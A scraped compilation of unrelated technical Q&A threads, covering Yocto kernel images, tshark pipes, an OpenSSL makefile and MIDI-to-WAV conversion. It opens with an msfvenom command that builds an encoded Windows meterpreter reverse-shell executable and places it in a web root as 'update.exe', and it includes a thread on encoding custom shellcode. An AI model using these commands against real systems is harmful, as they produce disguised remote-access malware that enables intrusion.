msfvenom --payload windows/meterpreter/reverse_tcp LHOST=********* LPORT=8080 -f exe --platform windows --arch x64 -e x64/shikata_ga_nai -i 10 > /var/www/html/update.exe
The encoder "shikata_ga_nai" doesn't have a x64 version. Thus, you can't this encoder for x64 payload encryption.
The correct version for x86 system:
msfvenom --payload windows/meterpreter/reverse_tcp LHOST=********* LPORT=8080 -f exe --platform windows --arch x86 -e x86/shikata_ga_nai -i 10 > /var/www/html/update.exe
Related
I have a manual process for compiling a Linux kernel for an embedded ARM device. I use the CONFIG_APPENDED_DTB=y option, append my DTB file to the zImage file, then convert to uImage:
cat arch/arm/boot/zImage ./arch/arm/boot/dts/lpc3250-phy3250.dtb > arch/arm/boot/zImage-dtb
mkimage -A arm -O linux -C none -T kernel -a 0x80008000 -e 0x80008000 -n 'Linux' \
-d arch/arm/boot/zImage-dtb arch/arm/boot/uImage
I'm attempting to migrate to Yocto. How can I implement the same process? I can set KERNEL_IMAGETYPE = "zImage" but I'm not sure how to postprocess the zImage file.
Note that my version of u-boot is fixed and quite old, so I am not currently considering migrating to other formats such as FIT.
I am a newcomer to Yocto, so expository answers are especially welcome.
At the moment I'm successfully running the following tshark command on Windows 10 and Windows server 2012:
tshark -l -n -r "\\.\pipe\tsharkpipe2"
but when I run it on Windows 7 and Windows server 2012, tshark gives me File does not exist error. However I can use the pipe with -i like:
tshark -i "\\.\pipe\tsharkpipe2"
but I need to run -Y filter and -T pdml which seems cannot be done using -i.
I'm using tshark 2.0.5 and C# Example from Wireshark wiki and both tshark and my client are running as Administrator.
Am I missing something here?
I've written some custom shellcode that I want to encode using Metasploit's msfvenom. Back when msfencode was still working this is the way the command would have gone:
$ echo -ne “\x31…\x80” | sudo msfencode -a x86 -t c -e x86/jmp_call_additive
"pipe the shellcode to msfencode for architecture x86 with the output as a c array with the x86/jmp_call_additive encoder"
Now I want to do the same thing except with msfvenom, so I tried:
$ echo -ne "\x31...\x80" | sudo msfvenom -e x86/jmp_call_additive -a x86 -t c
But I get the following error message:
Attempting to read payload from STDIN...
You must select a platform for a custom payload
I thought that giving the -a flag was specifying the correct platform/architecture, I've also tried --platform in place of -a but I still get the same error message.
I'm running this on a on a virtual machine using Ubuntu 32 bit. Thanks for any help
$ echo -ne “\x31...x80" | sudo msfvenom -e x86/jmp_call_additive -a x86 -p - --platform linux -f c
“pipe the custom shellcode into msfvenom with the x86/jmp_call_additive encoder on x86 architecture with a custom payload on a linux platform with a c array output format"
Fashioning a makefile to build openssl for windows and am running into something that has me puzzled. I want to just have it built with one call to make, supplying the platform to build. There is a parent makefile which calls a sub-make having set a few parameters based on the platform (linux, win32, win64, win64debug, etc).
The sub-makefile section for windows reads as follows:
winConfig: patch.tmp
cd $(BUILD_HOME)/openssl-$(VERSION) ; \
$(CHMOD) -R 777 * ; \
perl Configure $(PERL_CFG_TARGET) $(CFG_BASEOPTS) ; \
[ $(CFG_BITS) = 32 ] && ms/do_ms.bat ; \
[ $(CFG_BITS) = 64 ] && ms/do_win64a.bat
$(TOUCH) cfg-win$(CFG_BITS)$(CFG_DEBUG).tmp cfg.tmp
$(TOUCH) winConfig
winBuild: winConfig remakeDirs
cd $(BUILD_HOME)/openssl-$(VERSION) ; \
env -u MAKE -u MAKEFLAGS nmake -f ms/nt.mak install ; \
$(CP) crypto/ec/ec_lcl.h crypto/ecdsa/ecs_locl.h $(OPENSSL_INSTALL_DIR)/include/openssl/
$(TOUCH) winBuild
winPkg: winConfig winBuild
$(RM) $(TARGET_HOME)/$(OPENSSL_TARBALL)
$(TAR) -C $(OPENSSL_INSTALL_BASE) -cf $(TARGET_HOME)/$(OPENSSL_TARBALL) $(OPENSSL_INSTALL_TARGET)
$(GZIP) -f $(TARGET_HOME)/$(OPENSSL_TARBALL)
$(RM) $(OPENSSL_INSTALL_DIR)
$(TOUCH) winPkg
## build and install for Windows:
all-win: winPkg
A number of variables are set up top and that all appears to work fine. There are two issues I have here:
In the winbuild target, I get complaints about env not being found, however, nmake will not run unless I preceed it with that env command. Weird?
This is the one that really has me puzzled. The nmake lines appear to be run in the background. I say that because, I find in the output, the copy command, quickly followed by the tar + gzip commands... while the compile has just gotten underway. The resulting tarball, created approx 10min before the build completes, has only the directory structure of the install folder, plus the two files referenced.
How can I have this process completed synchronously without having to resort to building and tarring separately?
EDIT: Updated sample makefile above.
Calling via:
make -f openssl.mf win64
where openssl.mf contains:
win64:
make -j 1 -f openssl-sub.mf all-win CC=cl CXX=cl OUTPATH=out64 CFG_TARGET=VC-WIN64A
It continues to call the nmake in the background, then proceed to tar up a fairly empty directory. Not at all what I want to accomplish. I would like the make process sit and wait until nmake returns... is that possible?
Errored output:
cd L:/dev/openssl/openssl-build/openssl-1.0.1l ; \
env -u MAKE -u MAKEFLAGS nmake -f ms/nt.mak install ; \
L:/wintools/cygwin/cp -f crypto/ec/ec_lcl.h crypto/ecdsa/ecs_locl.h L:/dev/openssl/openssl-install/win64-x86/include/openssl/
Microsoft (R) Program Maintenance Utility Version 8.00.50727.762
Copyright (C) Microsoft Corporation. All rights reserved.
Building OpenSSL
perl util/mkdir-p.pl "tmp32"
created directory `tmp32'
perl util/mkdir-p.pl "out32"
created directory `out32'
perl util/mkdir-p.pl "inc32"
created directory `inc32'
perl util/mkdir-p.pl "inc32\openssl"
L:/wintools/cygwin/touch winBuild
created directory `inc32/openssl'
perl util/copy.pl ".\.\e_os.h" "tmp32\e_os.h"
Copying: ././e_os.h to tmp32/e_os.h
perl util/copy.pl ".\crypto\cryptlib.h" "tmp32\cryptlib.h"
Copying: ./crypto/cryptlib.h to tmp32/cryptlib.h
perl util/copy.pl ".\crypto\buildinf.h" "tmp32\buildinf.h"
Copying: ./crypto/buildinf.h to tmp32/buildinf.h
perl util/copy.pl ".\crypto\md32_common.h" "tmp32\md32_common.h"
Copying: ./crypto/md32_common.h to tmp32/md32_common.h
perl util/copy.pl ".\crypto\o_time.h" "tmp32\o_time.h"
Copying: ./crypto/o_time.h to tmp32/o_time.h
L:/wintools/rm -rf /dev/openssl/packages/win64-x86-openssl-1.0.1l.tar
perl util/copy.pl ".\crypto\o_str.h" "tmp32\o_str.h"
L:/wintools/Gow/bin/tar.exe -C L:/dev/openssl/openssl-install -cf /dev/openssl/packages/win64-x86-openssl-1.0.1l.tar win64-x86
Copying: ./crypto/o_str.h to tmp32/o_str.h
perl util/copy.pl ".\crypto\o_dir.h" "tmp32\o_dir.h"
Copying: ./crypto/o_dir.h to tmp32/o_dir.h
perl util/copy.pl ".\crypto\constant_time_locl.h" "tmp32\constant_time_locl.h"
Copying: ./crypto/constant_time_locl.h to tmp32/constant_time_locl.h
perl util/copy.pl ".\crypto\md4\md4_locl.h" "tmp32\md4_locl.h"
L:/wintools/cygwin/gzip -f /dev/openssl/packages/win64-x86-openssl-1.0.1l.tar
Copying: ./crypto/md4/md4_locl.h to tmp32/md4_locl.h
perl util/copy.pl ".\crypto\md5\md5_locl.h" "tmp32\md5_locl.h"
Copying: ./crypto/md5/md5_locl.h to tmp32/md5_locl.h
perl util/copy.pl ".\crypto\sha\sha_locl.h" "tmp32\sha_locl.h"
gzip: /dev/openssl/packages/win64-x86-openssl-1.0.1l.tar: No such file or directory
make[1]: *** [winPkg] Error 1
make[1]: Leaving directory `L:/dev/openssl'
make: *** [win64] Error 2
You can see, nr the bottom, where the tar command from winPkg has been issued prior to winbuild having completed.
I'm trying to convert a MIDI file to a WAV file, on OS X.
So far, I have this:
fluidsynth -F output_sound soundfont.sf2 note.mid
This creates an output_sound file, however, that file is not WAV, it seems to be in sint16 format given that I get this output:
~ $ fluidsynth -O help
FluidSynth version 1.1.6
Copyright (C) 2000-2012 Peter Hanappe and others.
Distributed under the LGPL license.
SoundFont(R) is a registered trademark of E-mu Systems, Inc.
-O options (audio file format):
's16'
Is there an easy way to convert the output_sound to a WAV file in Terminal (or in any scriptable fashion)?
There is a simpler way than using SoX: when FluidSynth is installed with libsndfile support, it outputs WAV by default. This is how Homebrew installs FluidSynth by default:
$ brew install fluid-synth
...
$ fluidsynth -T help
FluidSynth runtime version 2.0.8
Copyright (C) 2000-2019 Peter Hanappe and others.
Distributed under the LGPL license.
SoundFont(R) is a registered trademark of E-mu Systems, Inc.
-T options (audio file type):
'aiff','au','auto','avr','caf','flac','htk','iff','mat','mpc','oga','paf','pvf','raw','rf64','sd2','sds','sf','voc','w64','wav','wve','xi'
auto: Determine type from file name extension, defaults to "wav"
I found the easiest solution to be timidity:
timidity input.mid -Ow -o out.wav
If you use homebrew it's also trivial to install:
brew install timidity
Thanks to CL.'s comment I came up with this:
sox -t raw -r 44100 -e signed -b 16 -c 1 raw_audio audio.wav